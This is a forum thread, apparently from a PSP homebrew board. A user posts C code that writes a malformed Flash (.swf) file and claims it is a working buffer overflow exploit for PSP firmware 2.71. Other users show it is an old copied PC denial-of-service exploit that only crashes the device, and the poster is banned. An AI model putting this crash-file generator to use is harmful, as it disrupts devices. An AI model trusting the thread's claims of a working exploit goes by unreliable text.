Hello Coder X here, Below it the code for an Bufferoverrun exploite i found using the PSP 2.71 flash browser plug-in

This exploite bassed on a pc exploite (writen by a PC-Coder Named BassReFLeX)

Yes the code needs to be compiled and then you make the swf file.
(Sorry to complacate, but it must be done) next the file needs to be converted to a format the psp can read. "Use one of the thousands of sfw verson converters avalable"

Any one intrested in using the exploite and making a e-loader, please give me credit for the exploite, and contact me, we can work togeter to make it.

This is a tested exploite and does work, so i hope you all enjoy, 2.71 uses Welcome to Homebrew

I will be working on a bin for the program so expect tetris or something out in a bit.


/*
* ************************************************** *********
* PSP FW 2.71 Overflow Test
************************************************** ***********
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void usage(char* file);

/*
<swf>
...
</swf>
*/
char SWF[] = "<swf>";
char SWF_[] = "</swf>";

//[SetBackgroundColor]
char SetBackgroundColor[] = "\x43\x02\xff\x00\x00";

//[DoAction] 1 pwn j00r 455!
char DoAction[] =
"\x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x 41\x00\x40\x00"
"\x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x 43\x43\x43\x43"
"\x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x 45\x45\x45\x45"
"\x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x 00\x00";

//[ShowFrame]
char ShowFrame[] = "\x40\x00";

//[End]
char End[] = "\x00\x00";

int main(int argc,char* argv[])
{
system("cls");
printf("\n* ************************************************** ******* *");
printf("\n* Sony you can kiss my ass, 2.71 Welcome to Homebrew *");
printf("\n* ************************************************** ******* *");


if ( argc!=2 )
{
usage(argv[0]);
}

FILE *f;
f = fopen(argv[1],"w");
if ( !f )
{
printf("\nFile couldn't open!");
exit(1);
}

printf("\n\nWriting crafted .swf file . . .");
fwrite(SWF,1,sizeof(SWF),f);
fwrite("\n",1,1,f);
fwrite(SetBackgroundColor,1,sizeof(SetBackgroundCo lor),f);
fwrite("\n",1,1,f);
fwrite(DoAction,1,sizeof(DoAction),f);
fwrite("\n",1,1,f);
fwrite(ShowFrame,1,sizeof(ShowFrame),f);
fwrite("\n",1,1,f);
fwrite(End,1,sizeof(End),f);
fwrite("\n",1,1,f);
fwrite(SWF_,1,sizeof(SWF_),f);
printf("\nFile created successfully!");
printf("\nFilename: %s",argv[1]);
return 0;
}

void usage(char* file)
{
printf("\n\n");
printf("\n%s <Filename>",file);
printf("\n\nFilename = .swf crafted file. Eg: overflow.swf");
exit(1);
}

**** yeah thats another on for the homebrew scene now sony will really start getting pissed off

OMG This **** is off the hook! Good work CoderX!

I sure hope this works out for all the 2.7 plus users.

I practicaly went nut when it worked, well its been 37 hours with out sleep, good night

I practicaly went nut when it worked, well its been 37 hours with out sleep, good night
Take a well deserved rest that looks great. Another point for the homebrew comunity. Yeah

really?!?!?!?!
oh man!
lmao oh wow thats amazing

this is great news for 2.70/2.71 users, i wonder if sony will just throw out a useless update soon

Great job! :D :D :D :p :p

I wonder if Fanjita could make an eloader out of this? Probably could...

Weeee now my brother will stop bugging me :D

Note : for anyone who doesnt know, PacManFan told me on msn he is going to release the sourcecode of his PSX emulator which is 95% done

http://www.exploits-lab.info/Ddos-Attack/Exploits/Article625-Macromedia-Flash-Plugin-%3C=-70190-(Action)-Denial-of-Service-(DOS)-Exploit.html

Er, he just copied and pasted code from a year ago. Not only that, but it doesn't work. Good game !_!.

guys its fake ;) =/
btw....could someone ban him for this crap? :S

read this...
http://forums.qj.net/showthread.php?t=59521&page=1&pp=10

Ya umm read the source of the exploit in my origal post, i stated that is is a pc exploite

given your post count your just a QJ flamer who cant read

so do you think something good will come out off this exploit CoderX

I sure hope so, at the moment all it proves is that it can crash a psp

I also have to get some code in and see what system call i can make, we might have kernel but the browser runs in user, so i dont know for sure

Ya umm read the source of the exploit in my origal post, i stated that is is a pc exploite

given your post count your just a QJ flamer who cant readAll I see is that you edited that in after people figured out that all you did was copy and paste the source code ;).

" Last edited by CoderX : Today at 22:55."

Lmao. You've been proven fake. Your thread was closed and this will be soon. You can't do anything with this exploit. Good game.

there was hitchhikr, fanjita, mph, NOW CoderX!

All I see is that you edited that in after people figured out that all you did was copy and paste the source code ;).

" Last edited by CoderX : Today at 22:55."

Lmao. You've been proven fake. Your thread was closed and this will be soon. You can't do anything with this exploit. Good game.

you guys over at qj are the reason the scene is falling nice board over here at dcemu and nice people:cool:The people over at qj pissed coderx off I don't know what he will do atm

you guys over at qj are the reason the scene is falling nice board over here at dcemu and nice people:cool:The people over at qj pissed coderx off I don't know what he will do atm
Its just....he said he spent 37 hours making this. Then someone finds a page with the EXACT source, THEN he edits his post saying that he copied that exploit.

I REALLY dont know what to believe. I really want this to happen, so I wish him good luck;)

Seems the evidence is against you CoderX. I'm probably the worst when it comes to punishing fakers after dealing with the whole Donkey fiasco. I'm going to give you a one two-week ban. It would have been a permanent one had you not been a LUA coder previously to this.